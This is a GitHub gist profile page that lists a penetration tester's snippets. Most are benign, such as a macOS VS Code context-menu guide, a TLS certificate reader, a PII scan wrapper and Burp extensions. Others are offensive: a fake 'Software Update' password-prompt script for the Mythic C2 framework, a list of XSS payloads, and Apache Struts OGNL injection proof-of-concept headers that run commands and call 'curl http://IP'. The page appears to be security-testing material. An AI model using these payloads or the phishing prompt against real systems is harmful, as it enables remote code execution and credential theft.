Skip to content

Instantly share code, notes, and snippets.

View jimmy-ly00's full-sized avatar

Jimmy jimmy-ly00

21 followers · 89 following
View GitHub Profile
@jimmy-ly00
jimmy-ly00 / vscode-macos-context-menu.md
Created April 21, 2024 16:04 — forked from idleberg/vscode-macos-context-menu.md
“Open in Visual Studio Code” in macOS context-menu

Open in Visual Studio Code

  • Open Automator
  • Create a new document
  • Select Quick Action
  • Set “Service receives selected” to files or folders in any application
  • Add a Run Shell Script action
    • your default shell should already be selected, otherwise use /bin/zsh for macOS 10.15 (”Catalina”) or later
    • older versions of macOS use /bin/bash
  • if you're using something else, you probably know what to do 😉
@jimmy-ly00
jimmy-ly00 / extract_cn.py
Created February 8, 2024 14:18
Extract common name from TLS certificate via URLs
import ssl
import socket
from urllib.parse import urlparse
from cryptography import x509
from cryptography.hazmat.backends import default_backend
def get_certificate_common_name(url, timeout=3):
# Parse the URL to get the hostname
parsed_url = urlparse(url)
hostname = parsed_url.hostname
@jimmy-ly00
jimmy-ly00 / pdscan_recursive.py
Last active June 14, 2022 14:58
Find PII (Personally Identifiable Information) using pdscan
import glob
from selectors import EpollSelector
import subprocess
# Change these
ROOT_DIR = "/home/jimmy/desktop/spam"
PDSCAN_FILE = "/home/jimmy/desktop/pdscan" # Download from https://github.com/ankane/pdscan#installation
for filename in glob.iglob(ROOT_DIR + '**/**', recursive=True):
result = subprocess.run([PDSCAN_FILE, "file://" + filename,"--show-data", "--show-all"], capture_output=True, text=True) # remove "--show-all" for high confidence results
@jimmy-ly00
jimmy-ly00 / prompt.js
Created June 26, 2021 02:48
Mythic Apfell manual prompt.js
function myprompt(){
var app = Application.currentApplication()
app.includeStandardAdditions = true
var dialogText = "An application needs permission to update"
var title = "Software Update"
var iconPath = "/System/Library/PreferencePanes/SoftwareUpdate.prefPane/Contents/Resources/SoftwareUpdate.icns"
try{
var prompt = app.displayDialog(dialogText, {
givingUpAfter: "300",
defaultAnswer: "",
@jimmy-ly00
jimmy-ly00 / burp-external.py
Last active August 6, 2021 14:17
burp-external-crypto-invoke-header
from burp import IBurpExtender
"""
Name: External Crypto Header
Version: 0.0.1
Date: 10/03/2021
Author: Jimmy Ly
Github: https://github.com/jimmy-ly00
Description: This plugin adds headers useful for XXX
"""
@jimmy-ly00
jimmy-ly00 / burp-digest-hash.py
Created March 10, 2021 16:32
Burp extension to add a digest header with custom hashing of the bearer token header and request body (parameters). E.g. Digest: SHA512(Bearer Token Value + Parameters)
from burp import IBurpExtender
"""
Name: Digest Hash Header
Version: 0.0.1
Date: 10/03/2021
Author: Jimmy Ly
Github: https://github.com/jimmy-ly00
Description: This plugin adds headers useful for XXX
"""
@jimmy-ly00
jimmy-ly00 / ciphers.txt
Created July 23, 2018 15:33
List of OpenSSL ciphers
aes-128-cbc
aes-128-cfb
aes-128-cfb1
aes-128-cfb8
aes-128-ctr
aes-128-ecb
aes-128-ofb
aes-192-cbc
aes-192-cfb
aes-192-cfb1
@jimmy-ly00
jimmy-ly00 / netcat.py
Created June 23, 2018 09:36 — forked from leonjza/netcat.py
Python Netcat
import socket
class Netcat:
""" Python 'netcat like' module """
def __init__(self, ip, port):
self.buff = ""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@jimmy-ly00
jimmy-ly00 / xss.txt
Last active January 17, 2021 17:06
XSS payload (taken from: https://sql--injection.blogspot.co.uk/p/blog-page_80.html + other gist + some of my own)
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
"/><script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
"<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"
 /*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"
 /*
javascript:alert()//<svg/onload=alert()>'-alert("-alert()-")-'
" onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//>
<button ' onclick=alert(1)//>*/alert(1)//
" onclick=alert(1)//<button ' onclick=alert()//>
@jimmy-ly00
jimmy-ly00 / apache-struts.txt
Last active May 5, 2018 15:39
Apache Struts PoC
Content-Type: application/x-www-form-urlencoded%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('Jimmy',3195*5088)}.multipart/form-data
Content-Type: application/x-www-form-urlencoded %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec('curl http://IP'))}
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org